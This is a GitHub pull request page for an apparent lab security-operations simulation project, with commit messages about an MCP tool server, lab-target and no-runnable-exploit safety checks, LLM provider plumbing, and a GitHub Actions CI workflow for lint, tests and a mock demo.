ci: GitHub Actions for lint, tests, and demo-mock smoke#3
Open
markl-a wants to merge 7 commits into
Open
Conversation
Freeze the 11-tool MCP interface in docs/MCP-INTERFACE.md and back it with a FastMCP server. Extract pipeline functions from scenarios/run_kill_chain.py into phantom_secops/core.py so the Python orchestrator and MCP server share one implementation. - phantom_secops/mcp/safety.py centralises the lab-target whitelist and the no-runnable-POC prose validator. Tool wrappers and the MCP boundary both defer to it (defense-in-depth). - phantom_secops/llm/ adds a Provider protocol with three implementations (none, anthropic, phantom_mesh). LLM-augmented prose is validated against safety.is_safe_prose before being merged into output; failures fall back to deterministic templates so the pipeline never blocks on a flaky LLM. - Test suite grows 7 -> 32: MCP protocol smoke tests, safety unit tests, no-runnable-POC invariant, malicious-provider invariant under the LLM path, lifecycle confirmation invariant. - Makefile gains mcp-serve / mcp-dev. requirements-dev.txt adds mcp[cli]. scripts/lint.py covers the new phantom_secops/ package tree. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Wire the MCP server up to multiple agent runtimes so the same SecOps tools
drive workflows from any MCP client.
- .mcp.json + .claude/agents/secops-runner.md let Claude Code drive a full
kill-chain via the MCP tools. The subagent enforces lab-target gating,
prose-only exploit text, and lifecycle confirmation through the MCP
layer's safety guarantees rather than prompt rules alone.
- agents/{red,blue}/*.toml updated to reference MCP tool IDs through a new
[mcp] block (servers list + per-tool server field). Removed references to
fictional tools (http_probe, dns_enum, cve_lookup, nikto_runner, stats)
that no MCP tool backs. Format is provisional pending phantom-tools /
phantom-runtime release (May-June 2026).
- docs/INTEGRATIONS.md catalogues every supported runtime (Python ref,
Claude Code, phantom-mesh, Cursor, Continue, OpenAI Agents, LangGraph)
with minimal config snippets and current status.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
- README quick start now offers three paths (mock / Claude Code via MCP / phantom-mesh) and documents the LLM provider env-var selection. Status table updated with MCP server, Claude Code adapter, LLM abstraction. - ARCHITECTURE diagram redrawn with the MCP server as the single tool layer driven by interchangeable orchestrators; new "Why MCP first" section explains the tradeoff against direct phantom-mesh coupling. - INTERVIEW-TALK-TRACK pivots the elevator pitch from "powered by phantom- mesh" to "runtime-agnostic SecOps platform" and adds Q&As on safety layering, lab-gate enforcement, and the MCP-vs-direct-runtime decision. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Apply the intent of origin/fix/utf8-encoding-windows (043cb94) to the post-MCP-refactor file layout. The original fix patched scenarios/run_kill_chain.py file IO that has since moved to phantom_secops/core.py and partially survives in scenarios/run_kill_chain.py as the orchestrator's artifact writers. All read_text / write_text calls outside of test fixtures now pass encoding="utf-8" explicitly so mock-mode and live-mode runs produce identical bytes on Windows (cp1252 / mbcs default) and POSIX (utf-8 default). This supersedes origin/fix/utf8-encoding-windows; that branch's PR can be closed once this lands on main. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Make phantom-secops runtime-agnostic via MCP server
Three jobs run on push to main and on every PR:
- `lint`: stdlib-only run of scripts/lint.py (no install step).
- `test-no-deps`: installs only pytest + pytest-asyncio, runs `make test`
and `make demo-mock`. Verifies the README claim that the mock path
works on a stock Python install — tests/test_mcp_protocol.py skips
itself via pytest.importorskip("mcp").
- `test-full`: matrix on Python 3.11 and 3.12. Installs requirements-dev.txt,
runs lint + tests + demo-mock, then `--use-llm --llm none` to smoke-test
the LLM provider plumbing without an API key.
Concurrency control cancels in-progress runs when a new commit lands on
the same ref. Pip cache keyed on requirements-dev.txt.
Adds a CI badge to README so PR review and the repo landing page show
build state at a glance.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Two readme-adjacent docs in service of the 2026-05-20 ecosystem launch: * **STATUS.md** — explicit "🟡 Public Alpha" banner with a what-works table (mock + live demo, MCP server, agent suite, MTTD rendering), a what's-planned table pointing at the new L2 plan + post-launch ideas, and three hard safety rules that don't move (has_runnable_poc always false, lab targets deny-listed off-localhost, no customer-data ingest). Recruiters / contributors clicking from the phantom-mesh ecosystem table land here, see the alpha label, and know not to expect production polish without being mystified about what does work. * **docs/L2-INTEGRATION-PLAN.md** — the design doc for runtime integration with phantom-mesh (red/blue agents become [agent.red_team] / [agent.blue_team] in agents.toml, custom tools exposed via secops_mcp/server.py, demo-mock orchestrator drives via `phantom run` subprocess + JSON state file). Tracks 5h of evening work scheduled for 5/14 + 5/15. Uses a turn-state file for cross-process exchange — chosen because phantom repl stdout has ANSI + cost-line decorations that are fragile to parse. L1 branding was already in place (existing README badge, "Powered by phantom-mesh" tagline, [phantom-mesh] cross-link in MCP-server documentation). The L2 plan is the next step.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Summary
.github/workflows/ci.ymlruns three jobs on push to main and on every PR:scripts/lint.py, no install step.make demo-mockworks on a stock Python install.tests/test_mcp_protocol.pyskips itself viapytest.importorskip("mcp").requirements-dev.txt, runs lint + tests +make demo-mock+--use-llm --llm noneto smoke-test the LLM provider plumbing without an API key.requirements-dev.txt.Why now
The previous PR (#2) grew the test suite from 7 to 32 tests but had no CI. That gap meant any future PR could silently regress one of the safety invariants (no-runnable-POC, lab-target gate, malicious-provider rejection). This PR closes that gap.
Self-validating
This PR validates itself: the workflow runs on this PR's branch. If the badge stays green and all three jobs pass, the workflow design is correct.
Test plan
🤖 Generated with Claude Code